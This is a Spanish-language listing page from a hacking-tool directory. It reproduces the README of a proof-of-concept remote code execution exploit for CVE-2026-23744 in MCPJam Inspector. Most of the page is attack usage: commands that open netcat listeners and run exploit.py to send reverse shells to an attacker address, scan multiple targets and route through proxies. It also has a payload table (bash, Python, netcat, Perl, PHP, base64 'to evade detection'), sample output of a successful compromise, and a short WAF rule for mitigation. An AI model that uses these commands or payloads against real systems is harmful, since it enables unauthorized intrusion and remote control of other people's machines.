Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744-MCPJam-Exploit — Una prueba de concepto de explotación para CVE-2026-23744 - vulnerabilidad de Ejecución Remota de Código (RCE) en MCPJam Inspector. Esta herramienta demuestra la falla de seguridad en versiones <=1.4.2 y ayuda a los investigadores de seguridad a verificar parches. Solo para pruebas autorizadas y fines educativos. Incluye múltiples opciones de payload, ejecución de comandos y gestión de sesiones. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónDesarrollo de Payloads
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

Ver Repositorio
714hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Una prueba de concepto de explotación para CVE-2026-23744 - vulnerabilidad de Ejecución Remota de Código (RCE) en MCPJam Inspector. Esta herramienta demuestra la falla de seguridad en versiones <=1.4.2 y ayuda a los investigadores de seguridad a verificar parches. Solo para pruebas autorizadas y fines educativos. Incluye múltiples opciones de payload, ejecución de comandos y gestión de sesiones.

Compartir

CVE-2026-23744 MCPJam Inspector RCE Exploit

Security Research Python 3.7+ Version Author


⚠️ AVISO LEGAL

Esta herramienta es SOLO para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado es ilegal. Los usuarios asumen toda responsabilidad por sus acciones.


📋 Resumen

Este repositorio contiene una prueba de concepto del exploit para CVE-2026-23744, una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada encontrada en MCPJam Inspector versiones <=1.4.2. La vulnerabilidad tiene una puntuación CVSS crítica de 9.8, lo que indica un riesgo grave con un vector de ataque de red.

AtributoDetalles
ID CVECVE-2026-23744
VulnerabilidadEjecución Remota de Código no Autenticada
Versiones Afectadas<=1.4.2
Puntuación CVSS9.8 (Crítica)
Vector de AtaqueRed

📸 Capturas de Pantalla

ex

🚀 Características

La herramienta de exploit ofrece un conjunto completo de características diseñadas para pruebas de seguridad efectivas:

  • Soporte Multi-payload: Incluye payloads Bash, Python, Netcat, Perl, PHP y Base64.
  • Ejecución de Comandos: Ejecuta comandos en el sistema objetivo con captura de salida.
  • Escaneo de Objetivos: Escanea múltiples objetivos con limitación de tasa configurable.
  • Gestión de Sesiones: Gestión de sesiones persistente para pruebas continuas.
  • Soporte de Proxy: Integración con proxies para tráfico anónimo o enrutado.
  • Identificación del Objetivo: Identifica las características del sistema objetivo.
  • Configuración Automática de Listener: Configura automáticamente listeners para shells inversas.

📦 Instalación

Para configurar la herramienta de exploit, sigue estos pasos:

  1. Clonar el repositorio:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. Instalar dependencias:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 Ejemplos de Uso

Explotación Básica

Para iniciar una explotación básica, primero configura un listener y luego ejecuta el script de exploit:

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Ejecutar exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

Ejecución de Comandos

Ejecuta comandos individuales o comandos desde un archivo:

root@kitploit:~
# Ejecutar un solo comando
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Ejecutar comandos desde un archivo
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

Diferentes Payloads

Utiliza varios tipos de payload para diferentes escenarios:

root@kitploit:~
# Shell inversa en Python
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Shell inversa en Netcat
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Payload codificado en Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

Escaneo de Objetivos

Escanea múltiples objetivos en busca de vulnerabilidades:

root@kitploit:~
# Crear archivo de objetivos
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Escanear objetivos vulnerables
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

Opciones Avanzadas

Explora funcionalidades avanzadas como identificación, uso de proxy, modo verbose y configuración automática de listener:

root@kitploit:~
# Con identificación
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# Con proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Modo verbose
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Listener automático
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 Tipos de Payload

TipoComandoMejor Para
bashShell inversa BashLa mayoría de sistemas Linux
pythonShell inversa Python3Sistemas con Python instalado
ncShell inversa NetcatSistemas con netcat
perlShell inversa PerlSistemas con Perl instalado
phpShell inversa PHPSistemas con PHP instalado
base64Codificado en Base64Evadir detección

📊 Salida de Ejemplo

root@kitploit:~
[+] Iniciando exploit mejorado contra http://192.168.1.100:8080
[+] Shell inversa hacia 10.0.0.5:4444
[*] ID de Sesión: AbCdEfGh
[*] Identificando objetivo...
[+] SO objetivo: Ubuntu
[+] Capacidades disponibles: python3, perl, nc
[*] Ejecutando exploit...
[+] Exploit exitoso!
[!] Revisa tu listener de netcat en 10.0.0.5:4444

🛡️ Mitigación

Acciones Inmediatas

Para protegerse contra CVE-2026-23744, es crucial tomar las siguientes acciones inmediatas:

  • Actualizar MCPJam Inspector a la versión >1.4.2.
  • Aislar los sistemas vulnerables de la red.
  • Monitorear solicitudes POST sospechosas a /api/mcp/connect.
  • Implementar reglas de WAF (Web Application Firewall) para bloquear patrones maliciosos.

Ejemplo de Regla WAF

Ejemplo de regla Nginx WAF para bloquear patrones maliciosos comunes:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ Preguntas Frecuentes (FAQ)

P: ¿Es legal usar esto?

R: Esta herramienta solo es legal para usar en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas.

P: ¿Qué sistemas son vulnerables?

R: Las versiones de MCPJam Inspector <=1.4.2 son vulnerables.

P: ¿Cómo puedo proteger mis sistemas?

R: Actualiza MCPJam Inspector a la versión >1.4.2 inmediatamente.


📚 Referencias

  • CVE-2026-23744 MITRE

👤 Autor

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 Registro de Cambios

Versión 2.0 (14 de julio de 2026)

  • ✅ Corregida la fiabilidad de la verificación del listener
  • ✅ Implementado el modo de ejecución de comandos
  • ✅ Añadida identificación del objetivo
  • ✅ Mejorada la gestión de sesiones
  • ✅ Añadidos fallbacks de payload

Versión 1.0 (10 de julio de 2026)

  • ✅ Lanzamiento inicial

⚠️ Advertencia Final

El uso no autorizado de esta herramienta es ilegal y puede acarrear graves consecuencias, incluyendo:

  • Procesamiento penal
  • Demandas civiles
  • Antecedentes penales permanentes
  • Sanciones profesionales

Hecho con ❤️ por Sudeepa Wanigarathna

Descargar herramienta